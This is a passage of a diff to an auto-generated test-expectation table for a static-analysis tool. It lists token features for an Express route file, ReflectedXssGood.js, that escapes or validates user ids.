contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:40:9:42 | req | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:40:9:42 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:40:9:42 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:40:9:49 | req.params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:40:9:49 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:40:9:49 | req.params | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:40:9:49 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:40:9:49 | req.params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:44:9:49 | params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:44:9:49 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:44:9:49 | params | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:44:9:49 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:44:9:49 | params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:51:9:52 | id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:51:9:52 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:51:9:52 | id | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:51:9:52 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:51:9:52 | id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:1:16:3 | app | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:1:16:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:1:16:3 | app | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:1:16:7 | app.get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:1:16:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:1:16:7 | app.get | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:1:20:2 | app.get ... });\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:1:20:2 | app.get ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:1:20:2 | app.get ... });\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:1:20:2 | exceptional return of app.get ... });\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:1:20:2 | exceptional return of app.get ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:1:20:2 | exceptional return of app.get ... });\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:5:16:7 | get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:5:16:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:5:16:7 | get | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:9:16:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:9:16:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:9:16:19 | '/user/:id' | calleeImports | express | @@ -21040,6 +140439,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:9:16:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:9:16:19 | '/user/:id' | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:9:16:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:16:21 | this | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:16:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:16:21 | this | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:16:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:16:21 | this | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | 'arguments' object of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | exceptional return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | exceptional return of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | exceptional return of anonymous function | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | functio ... d });\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | functio ... d });\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | functio ... d });\\n} | calleeImports | express | @@ -21047,6 +140461,96 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | functio ... d });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | functio ... d });\\n} | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | functio ... d });\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | return of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:22:20:1 | return of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:31:16:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:31:16:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:31:16:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:31:16:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:31:16:33 | req | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:31:16:33 | req | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:31:16:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:31:16:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:31:16:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:31:16:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:36:16:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:36:16:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:36:16:38 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:36:16:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:36:16:38 | res | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:36:16:38 | res | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:36:16:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:36:16:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:36:16:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:16:36:16:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:7:17:35 | !isVali ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:7:17:35 | !isVali ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:7:17:35 | !isVali ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:7:17:35 | !isVali ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:7:17:35 | !isVali ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:20 | isValidUserId | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:20 | isValidUserId | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:20 | isValidUserId | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:20 | isValidUserId | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:20 | isValidUserId | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:35 | exceptional return of isValid ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:35 | exceptional return of isValid ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:35 | exceptional return of isValid ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:35 | exceptional return of isValid ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:35 | exceptional return of isValid ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:35 | isValid ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:35 | isValid ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:35 | isValid ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:35 | isValid ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:8:17:35 | isValid ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:22:17:24 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:22:17:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:22:17:24 | req | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:22:17:24 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:22:17:24 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:22:17:31 | req.params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:22:17:31 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:22:17:31 | req.params | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:22:17:31 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:22:17:31 | req.params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:26:17:31 | params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:26:17:31 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:26:17:31 | params | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:26:17:31 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:26:17:31 | params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:33:17:34 | id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:33:17:34 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:33:17:34 | id | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:33:17:34 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:17:33:17:34 | id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:7 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:7 | res | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:7 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:14 | res.render | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:14 | res.render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:14 | res.render | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:14 | res.render | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:14 | res.render | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:60 | exceptional return of res.ren ... s.id }) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:60 | exceptional return of res.ren ... s.id }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:60 | exceptional return of res.ren ... s.id }) | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:60 | exceptional return of res.ren ... s.id }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:60 | exceptional return of res.ren ... s.id }) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:60 | res.ren ... s.id }) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:60 | res.ren ... s.id }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:60 | res.ren ... s.id }) | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:60 | res.ren ... s.id }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:5:19:60 | res.ren ... s.id }) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:9:19:14 | render | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:9:19:14 | render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:9:19:14 | render | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:9:19:14 | render | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:9:19:14 | render | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:16:19:36 | invalid ... emplate | CalleeFlexibleAccessPath | res.render | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:16:19:36 | invalid ... emplate | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:16:19:36 | invalid ... emplate | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21063,6 +140567,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:39:19:59 | { id: r ... ms.id } | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:39:19:59 | { id: r ... ms.id } | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:39:19:59 | { id: r ... ms.id } | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:42 | id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:42 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:42 | id | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:42 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:42 | id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:57 | id: req.params.id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:57 | id: req.params.id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:57 | id: req.params.id | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:57 | id: req.params.id | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:57 | id: req.params.id | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:57 | id: req.params.id | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:57 | id: req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:57 | id: req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:57 | id: req.params.id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:41:19:57 | id: req.params.id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:47 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:47 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:47 | req | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:47 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:47 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:54 | req.params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:54 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:54 | req.params | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:54 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:54 | req.params | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:57 | req.params.id | CalleeFlexibleAccessPath | res.render | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:57 | req.params.id | InputAccessPathFromCallee | 1.id | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:57 | req.params.id | InputArgumentIndex | 1 | @@ -21072,6 +140601,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:57 | req.params.id | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:57 | req.params.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:45:19:57 | req.params.id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:49:19:54 | params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:49:19:54 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:49:19:54 | params | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:49:19:54 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:49:19:54 | params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:56:19:57 | id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:56:19:57 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:56:19:57 | id | enclosingFunctionBody | req res isValidUserId req params id res render invalidUserIdTemplate id req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:56:19:57 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:19:56:19:57 | id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:1:22:3 | app | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:1:22:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:1:22:3 | app | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:1:22:7 | app.get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:1:22:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:1:22:7 | app.get | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:1:30:2 | app.get ... ;\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:1:30:2 | app.get ... ;\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:1:30:2 | app.get ... ;\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:1:30:2 | exceptional return of app.get 